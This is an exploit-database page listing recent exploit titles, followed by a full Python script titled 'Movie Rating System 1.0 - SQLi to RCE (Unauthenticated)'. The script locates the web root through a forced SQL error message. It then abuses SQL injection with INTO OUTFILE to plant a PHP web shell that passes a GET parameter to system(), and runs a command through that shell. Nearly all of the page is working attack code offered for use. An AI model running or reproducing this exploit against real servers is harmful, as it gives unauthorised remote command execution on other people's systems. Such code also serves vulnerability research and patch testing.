
32 changes to exploits/shellcodes Siemens S7 Layer 2 - Denial of Service (DoS) TRIGONE Remote System Monitor 3.61 - Unquoted Service Path Automox Agent 32 - Local Privilege Escalation ConnectWise Control 19.2.24707 - Username Enumeration Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS) AWebServer GhostBuilding 18 - Denial of Service (DoS) TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated) Dixell XWEB 500 - Arbitrary File Write Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated) CMSimple 5.4 - Cross Site Scripting (XSS) RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated) RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated) RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated) WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated) WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated) Movie Rating System 1.0 - SQLi to RCE (Unauthenticated) Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated) Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS) SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS) Nettmp NNT 5.1 - SQLi Authentication Bypass Hostel Management System 2.1 - Cross Site Scripting (XSS) Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated) BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated) Hospitals Patient Records Management System 1.0 - Account TakeOver Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated) Vodafone H-500-s 3.5.10 - WiFi Password Disclosure openSIS Student Information System 8.0 - 'multiple' SQL Injection Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS) WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)
71 lines
No EOL
2.3 KiB
Python
Executable file
71 lines
No EOL
2.3 KiB
Python
Executable file
# Exploit Title: Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)
|
|
# Date: 22/12/2021
|
|
# Exploit Author: Tagoletta (Tağmaç)
|
|
# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html
|
|
# Version: 1.0
|
|
# Tested on: Ubuntu
|
|
# This exploit only works correctly if user is database administrator. if not user is database administrator, continue with sql injection payloads.
|
|
|
|
import requests
|
|
import random
|
|
import string
|
|
from bs4 import BeautifulSoup
|
|
|
|
url = input("TARGET = ")
|
|
|
|
if not url.startswith('http://') and not url.startswith('https://'):
|
|
url = "http://" + url
|
|
if not url.endswith('/'):
|
|
url = url + "/"
|
|
|
|
payload = "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"
|
|
|
|
let = string.ascii_lowercase
|
|
shellname = ''.join(random.choice(let) for i in range(15))
|
|
|
|
resp = requests.get(url)
|
|
htmlParser = BeautifulSoup(resp.text, 'html.parser')
|
|
|
|
getMenu = htmlParser.findAll("a", {"class": "nav-link"})
|
|
selectPage = ""
|
|
for i in getMenu:
|
|
if "movie" in i.text.lower():
|
|
selectPage = i["href"]
|
|
break
|
|
|
|
selectPage = selectPage.replace("./","")
|
|
findSql = url + selectPage
|
|
resp = requests.get(findSql)
|
|
htmlParser = BeautifulSoup(resp.text, 'html.parser')
|
|
movieList = htmlParser.findAll("a", {"class" : "card card-outline card-primary shadow rounded-0 movie-item text-decoration-none text-dark"})
|
|
|
|
sqlPage = movieList[0]["href"]
|
|
sqlPage = sqlPage.replace("./","")
|
|
|
|
sqlPage = url + sqlPage
|
|
|
|
print("\nFinding path")
|
|
|
|
findPath = requests.get(sqlPage + '\'')
|
|
findPath = findPath.text[findPath.text.index("<b>Warning</b>: ")+17:findPath.text.index("</b> on line ")]
|
|
findPath = findPath[findPath.index("<b>")+3:len(findPath)]
|
|
print("injection page: "+sqlPage)
|
|
|
|
parser = findPath.split('\\')
|
|
parser.pop()
|
|
findPath = ""
|
|
for find in parser:
|
|
findPath += find + "/"
|
|
|
|
print("\nFound Path : " + findPath)
|
|
|
|
SQLtoRCE = "-1881' OR 1881=1881 LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"
|
|
SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php")
|
|
SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())
|
|
|
|
print("\n\nShell Uploading...")
|
|
status = requests.get(sqlPage+SQLtoRCE)
|
|
|
|
shellOutput = requests.get(url+shellname+".php?tago=whoami")
|
|
print("\n\nShell Output : "+shellOutput.text)
|
|
print("\nShell Path : " + url+shellname+".php") |